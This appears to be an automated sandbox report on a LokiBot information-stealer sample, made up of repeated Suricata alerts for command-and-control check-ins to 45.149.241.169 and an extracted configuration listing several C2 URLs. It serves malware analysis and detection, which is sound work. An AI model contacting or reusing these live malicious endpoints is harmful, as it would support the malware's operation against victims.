2024-10-03T09:22:43.911035+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:44.840138+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64449	45.149.241.169	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:48.138102+0200	2021641	1	A Network Trojan was detected	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:49.427132+0200	2021641	1	A Network Trojan was detected	192.168.2.11	49712	45.149.241.169	80	TCP
2024-10-03T09:20:50.395968+0200	2021641	1	A Network Trojan was detected	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:52.138116+0200	2021641	1	A Network Trojan was detected	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:53.059614+0200	2021641	1	A Network Trojan was detected	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:55.313220+0200	2021641	1	A Network Trojan was detected	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:56.544536+0200	2021641	1	A Network Trojan was detected	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:58.316168+0200	2021641	1	A Network Trojan was detected	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:59.272737+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:00.670903+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:01.623467+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:02.448704+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:03.488048+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:04.428362+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:05.363793+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:06.386274+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:07.265208+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.224949+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:09.172629+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.997521+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:10.996788+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:12.112321+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:13.055508+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.916854+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:14.881238+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:16.059969+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:17.083633+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:18.023488+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:19.175709+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:21.592824+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:22.386915+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.246842+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:24.104473+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:25.029228+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.820375+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:26.851586+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:27.810227+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:28.697925+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:29.591807+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:30.413511+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:31.498785+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:32.743030+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:33.556187+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:35.239657+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:46.647501+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:47.487101+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:48.440836+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:49.258711+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:50.499694+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.287566+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:52.148748+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.981934+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:54.007169+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.945256+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:55.920209+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:57.220850+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.171912+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:59.151255+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:22:00.075267+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:01.051486+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:03.157629+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:04.115545+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:05.338912+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:06.283716+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:07.225458+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:08.313595+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:09.230403+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:10.331436+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:11.239806+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.172123+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:13.068985+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:14.008975+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.936067+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:15.929179+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:16.827330+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:17.703674+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:18.714301+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:19.547744+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:20.566222+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:21.356699+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.220181+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:23.369318+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:24.106031+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.910667+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:25.816016+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:26.659850+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:27.504132+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:28.311778+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:29.639445+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:30.646052+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:31.674682+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:32.502916+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:33.340490+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:34.448158+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.225001+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:36.015476+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.917140+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:37.931400+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:38.836712+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:39.681925+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:40.614660+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:41.558183+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:42.344416+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:43.251789+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:44.067474+0200	2021641	1	A Network Trojan was detected	192.168.2.11	64449	45.149.241.169	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:48.138102+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:49.427132+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	49712	45.149.241.169	80	TCP
2024-10-03T09:20:50.395968+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:52.138116+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:53.059614+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:55.313220+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:56.544536+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:58.316168+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:59.272737+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:00.670903+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:01.623467+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:02.448704+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:03.488048+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:04.428362+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:05.363793+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:06.386274+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:07.265208+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.224949+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:09.172629+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.997521+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:10.996788+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:12.112321+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:13.055508+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.916854+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:14.881238+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:16.059969+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:17.083633+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:18.023488+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:19.175709+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:21.592824+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:22.386915+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.246842+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:24.104473+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:25.029228+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.820375+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:26.851586+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:27.810227+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:28.697925+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:29.591807+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:30.413511+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:31.498785+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:32.743030+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:33.556187+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:35.239657+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:46.647501+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:47.487101+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:48.440836+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:49.258711+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:50.499694+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.287566+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:52.148748+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.981934+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:54.007169+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.945256+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:55.920209+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:57.220850+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.171912+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:59.151255+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:22:00.075267+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:01.051486+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:03.157629+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:04.115545+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:05.338912+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:06.283716+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:07.225458+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:08.313595+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:09.230403+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:10.331436+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:11.239806+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.172123+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:13.068985+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:14.008975+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.936067+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:15.929179+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:16.827330+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:17.703674+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:18.714301+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:19.547744+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:20.566222+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:21.356699+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.220181+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:23.369318+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:24.106031+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.910667+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:25.816016+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:26.659850+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:27.504132+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:28.311778+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:29.639445+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:30.646052+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:31.674682+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:32.502916+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:33.340490+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:34.448158+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.225001+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:36.015476+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.917140+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:37.931400+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:38.836712+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:39.681925+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:40.614660+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:41.558183+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:42.344416+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:43.251789+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:44.067474+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.11	64449	45.149.241.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\mjtjewi.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Comprobante.lnk.lnk

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49711 -> 45.149.241.169:80
